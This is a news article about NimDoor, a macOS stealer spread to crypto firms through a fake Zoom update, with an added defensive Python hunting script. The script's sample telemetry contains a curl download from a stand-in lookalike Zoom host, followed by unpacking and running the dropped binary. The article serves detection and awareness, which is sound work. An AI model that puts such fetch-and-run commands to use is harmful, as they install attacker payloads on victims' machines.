State-backed North Korean hackers are baiting Web3 and cryptocurrency firms with elaborate social engineering into running a fake Zoom update, with malware written partly in a rarely used programming language.
Hackers from the Democratic People’s Republic of Korea (DPRK) are approaching Web3 firms by posing as trusted contacts on Telegram, scheduling meetings via Calendly, and tricking victims into running a malware-laden “Zoom SDK update script”. The resulting malware family has been named NimDoor.
Once installed, it goes after browser data, passwords, cryptocurrency wallets, and other sensitive files on the victim’s machine.
According to a report from SentinelLabs, the attack chain mixes AppleScript, C++, and the little-used Nim programming language, and pulls further malicious code from a server posing as Zoom infrastructure.
In short, the fake Zoom update is an AppleScript. When run, it fetches second-stage scripts from the remote server; those unpack ZIP archives containing the binaries and scripts that carry out the information theft.
A C++ loader then drops additional components, including trojan binaries, onto the infected Mac, and the stealer components harvest everything they can reach.
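The chain described above is easier to hunt for as a sequence of behaviors than as a set of file hashes. The script below is an added example, not code from the article or from the SentinelLabs report: it grades process telemetry for the sequence AppleScript runs, a lookalike "Zoom" host is contacted, a ZIP archive is unpacked, and a binary executes from the extraction directory. The JSON-lines event format, session identifiers, hostnames (using the reserved `.example` domain) and file paths are all constructed for illustration and are not indicators from the report.

```python
"""Hunt for a NimDoor-style infection chain in macOS process telemetry.

Added example (not from the SentinelLabs report or the article). It models
the chain the article describes: osascript runs a script, something fetches
from a host posing as Zoom, an archive is unpacked, and a dropped binary
runs. All sample events, hostnames and paths below are constructed.
"""
import json
import re
import shlex
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: only hosts under these registrable domains are genuine Zoom.
LEGIT_ZOOM_DOMAINS = ("zoom.us", "zoom.com")
URL_RE = re.compile(r"https?://[^\s'\"]+")

# Constructed telemetry, one JSON object per process-exec event.
# s1: malicious chain; s2: benign script plus real Zoom download; s3: lone lookalike fetch.
SAMPLE_EVENTS = """\
{"session": "s1", "ts": 1, "exe": "/usr/bin/osascript", "cmdline": "osascript /Users/dev/Downloads/zoom_sdk_support.scpt"}
{"session": "s1", "ts": 2, "exe": "/usr/bin/curl", "cmdline": "curl -s https://zoom-sdk-update.example/update -o /tmp/zsdk.zip"}
{"session": "s1", "ts": 3, "exe": "/usr/bin/unzip", "cmdline": "unzip -o /tmp/zsdk.zip -d /tmp/zsdk"}
{"session": "s1", "ts": 4, "exe": "/tmp/zsdk/a", "cmdline": "/tmp/zsdk/a"}
{"session": "s2", "ts": 1, "exe": "/usr/bin/osascript", "cmdline": "osascript /Users/dev/bin/tidy_desktop.scpt"}
{"session": "s2", "ts": 2, "exe": "/usr/bin/curl", "cmdline": "curl -s https://zoom.us/client/latest -o /tmp/zoom.pkg"}
{"session": "s3", "ts": 1, "exe": "/usr/bin/curl", "cmdline": "curl https://zoom-sdk-update.example/x -o /tmp/x.zip"}
"""


def is_zoom_lookalike(host: str) -> bool:
    """A host that trades on the Zoom name without living under a Zoom domain."""
    host = host.lower().rstrip(".")
    if "zoom" not in host:
        return False
    return not any(host == d or host.endswith("." + d) for d in LEGIT_ZOOM_DOMAINS)


def unzip_target(cmdline: str) -> str:
    """Directory an `unzip` invocation extracts into (`-d DIR`; '.' if absent)."""
    argv = shlex.split(cmdline)
    if "-d" in argv:
        i = argv.index("-d")
        if i + 1 < len(argv):
            return argv[i + 1].rstrip("/")
    return "."


def classify(events):
    """Map each stage of the chain to the first event (by ts) that exhibits it."""
    stages = {}
    unpack_dir = None
    for ev in sorted(events, key=lambda e: e["ts"]):
        exe, cmd = ev["exe"], ev["cmdline"]
        if exe.endswith("/osascript") and re.search(r"\.(scpt|applescript)\b", cmd):
            stages.setdefault("applescript", ev)
        for url in URL_RE.findall(cmd):
            if is_zoom_lookalike(urlsplit(url).hostname or ""):
                stages.setdefault("lookalike_fetch", ev)
        if exe.endswith("/unzip") and "unpack" not in stages:
            stages["unpack"] = ev
            unpack_dir = unzip_target(cmd)
        # Anything executed out of the extraction directory counts as a dropped payload.
        if unpack_dir and exe.startswith(unpack_dir + "/"):
            stages.setdefault("dropped_exec", ev)
    return stages


def verdict(stages) -> str:
    """Grade a session by the longest prefix of the chain seen in timestamp order."""
    t = {k: v["ts"] for k, v in stages.items()}
    chain = ["applescript", "lookalike_fetch", "unpack", "dropped_exec"]
    n = 0
    while n < len(chain) and chain[n] in t and (n == 0 or t[chain[n - 1]] < t[chain[n]]):
        n += 1
    if n == len(chain):
        return "high"
    if n >= 2:
        return "medium"
    return "low" if "lookalike_fetch" in t else "clean"


def hunt(jsonl: str) -> dict:
    """Group JSON-lines process events by session and grade each one."""
    by_session = defaultdict(list)
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            by_session[ev["session"]].append(ev)
    return {s: verdict(classify(evs)) for s, evs in sorted(by_session.items())}


if __name__ == "__main__":
    for session, grade in hunt(SAMPLE_EVENTS).items():
        print(session, grade)
```

The grading deliberately keys on order and behavior rather than on the payload's language or hash: a benign AppleScript followed by a download from a genuine Zoom domain (session s2) stays clean, while a lookalike-domain fetch on its own (s3) is worth a low-priority look even without the rest of the chain.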
The researchers describe the tooling as unusually complex for macOS malware, and note that Nim lets the attackers “blend complex behavior” into their binaries.
They expect attackers, macOS malware authors in particular, to keep adopting obscure programming languages: such languages offer technical advantages and are unfamiliar to analysts, which slows investigation and detection.
Troublingly, this means companies of all sizes will need to do two things. First, step up staff education on social engineering and the specific tactics in play here: unsolicited contact on Telegram, meeting invitations, and requests to install an “update” before a call.
Second, strengthen threat detection so that it does not hinge on the language a payload was written in. Signatures tuned to familiar toolchains will miss binaries built with less common ones, so detection needs to key on behavior, such as a script fetching and unpacking code from an unfamiliar server.
Earlier this year, North Korean hackers stole about $1.5 billion from the cryptocurrency exchange Bybit, and their cumulative haul over the years is far larger.
Unfortunately, it is a familiar story: as defenses improve, so do the attackers.